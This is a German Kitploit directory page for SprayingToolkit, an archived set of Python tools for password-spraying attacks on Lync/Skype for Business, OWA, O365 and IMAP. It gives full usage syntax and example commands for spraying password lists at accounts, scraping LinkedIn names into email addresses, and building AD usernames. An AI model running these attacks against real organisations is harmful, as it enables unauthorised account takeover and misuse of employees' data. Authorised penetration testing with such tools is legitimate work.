Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SprayingToolkit — Skripte, um Password-Spraying-Angriffe gegen Lync/S4B, OWA & O365 deutlich schneller, weniger schmerzhaft und effizienter zu machen. | Kitploit
Tools/GitHubGitHub/byt3bl33d3r/sprayingtoolkit
AufklärungOSINT für Social EngineeringPasswortangriffeInformationsbeschaffungPenetrationstestsE-Mail-SammlungRed TeamingArchived
GitHubbyt3bl33d3r/sprayingtoolkit

SprayingToolkit

Skripte, um Password-Spraying-Angriffe gegen Lync/S4B, OWA & O365 deutlich schneller, weniger schmerzhaft und effizienter zu machen.

Repository anzeigen
1.6k271vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hinweis zur Einstellung

Dieses Projekt wird nicht mehr weitergepflegt. Die folgenden Alternativprojekte sind besser und werden aktiv gewartet:

  • TREVORspray
  • CredMaster

SprayingToolkit

SprayingToolkit

Beschreibung

Eine Sammlung von Python-Skripten/Dienstprogrammen, die versucht, Passwort-Spraying-Angriffe gegen Lync/S4B und OWA erheblich schneller, weniger schmerzhaft und effizienter zu machen.

Sponsoren

Offizieller Discord-Kanal

Komm auf Discord vorbei!

Porchetta Industries

Installation

Installiere die Voraussetzungen mit pip3 wie folgt:

root@kitploit:~
sudo -H pip3 install -r requirements.txt

Oder nutze eine Python- virtuelle Umgebung, wenn du die Pakete nicht global installieren möchtest.

Tool-Übersicht

Atomizer

Ein extrem schneller Passwort-Sprayer für Lync/Skype For Business und OWA, basierend auf Asyncio und Python 3.7

Verwendung

root@kitploit:~
Usage:
    atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --recon [--debug]
    atomizer -h | --help
    atomizer -v | --version

Arguments:
    target         Zieldomäne oder URL
    password       Passwort für das Spraying
    userfile       Datei mit Benutzernamen (einer pro Zeile)
    passwordfile   Datei mit Passwörtern (eines pro Zeile)

Options:
    -h, --help               diesen Bildschirm anzeigen
    -v, --version            Version anzeigen
    -c, --csvfile CSVFILE    CSV-Datei mit Benutzernamen und Passwörtern
    -i, --interval TIME      Spraying im angegebenen Intervall [Format: "H:M:S"]
    -t, --threads THREADS    Anzahl der zu verwendenden gleichzeitigen Threads [Standard: 3]
    -d, --debug              Debug-Ausgabe aktivieren
    -p, --targetPort PORT    Zielport des IMAP-Servers (nur IMAP) [Standard: 993]
    --recon                  nur Informationen sammeln, kein Passwort-Spraying
    --gchat URL              gchat-Webhook-URL für Benachrichtigungen
    --slack URL              slack-Webhook-URL für Benachrichtigungen
    --user-row-name NAME     Titel der Benutzernamen-Zeile in der CSV-Datei [Standard: Email Address]
    --pass-row-name NAME     Titel der Passwort-Zeile in der CSV-Datei [Standard: Password]
    --user-as-pass USERFILE  die Benutzernamen in der angegebenen Datei als Passwort verwenden (einer pro Zeile)

Beispiele

root@kitploit:~
./atomizer.py owa contoso.com 'Fall2018' emails.txt
root@kitploit:~
./atomizer.py lync contoso.com 'Fall2018' emails.txt
root@kitploit:~
./atomizer lync contoso.com --csvfile accounts.csv
root@kitploit:~
./atomizer lync contoso.com --user-as-pass usernames.txt
root@kitploit:~
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
root@kitploit:~
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>

Vaporizer

Ein Port von @OrOneEqualsOnes GatherContacts Burp-Erweiterung auf mitmproxy mit einigen Verbesserungen.

Durchsucht Google und Bing nach LinkedIn-Profilen, generiert automatisch E-Mails aus den Profilnamen mithilfe des angegebenen Musters und führt Passwort-Spraying in Echtzeit durch.

(Basiert auf Atomizer)

Beispiele

root@kitploit:~
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'

Standardmäßig ist email_format auf das Muster {first}.{last} gesetzt und ist kein Pflichtargument.

Der Parameter domain ist die Domäne, die zum Generieren von E-Mails aus Namen verwendet wird. Der Parameter target ist die Domäne oder URL, gegen die das Passwort-Spraying durchgeführt werden soll.

Installiere das mitmproxy-Zertifikat, setze den Proxy in deinem Browser, gehe zu Google und/oder Bing und suche (stelle sicher, dass du /in einfügst):

site:linkedin.com/in "Target Company Name"

Die E-Mails werden im angegebenen Format in emails.txt ausgegeben und an Atomizer zum Spraying übergeben.

Aerosol

Sammelt den gesamten Text der Zielwebsite und sendet ihn zur Analyse an AWS Comprehend, um benutzerdefinierte Wortlisten für Passwort-Spraying zu erstellen.

Noch in Arbeit

Verwendung

root@kitploit:~
mitmdump -s aerosol.py --set domain=domain.com

Spindrift

Konvertiert Namen in Active-Directory-Benutzernamen (z. B. Alice Eve => CONTOSO\aeve)

Verwendung

root@kitploit:~
Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    Datei mit Namen, kann auch von stdin lesen

Options:
    --target TARGET   optionale Domäne oder URL, um den internen Domänennamen von OWA abzurufen
    --domain DOMAIN   Domäne manuell angeben, die jedem Benutzernamen vorangestellt wird
    --format FORMAT   Benutzernamen-Format [Standard: {f}{last}]

Beispiele

Liest Namen von STDIN, --domain wird verwendet, um die Domäne manuell anzugeben:

root@kitploit:~
cat names.txt | ./spindrift.py --domain CONTOSO

Liest Namen aus names.txt, --target ruft den internen Domänennamen dynamisch von OWA ab (du kannst eine Domäne oder URL angeben):

root@kitploit:~
./spindrift.py names.txt --target contoso.com
Tool herunterladen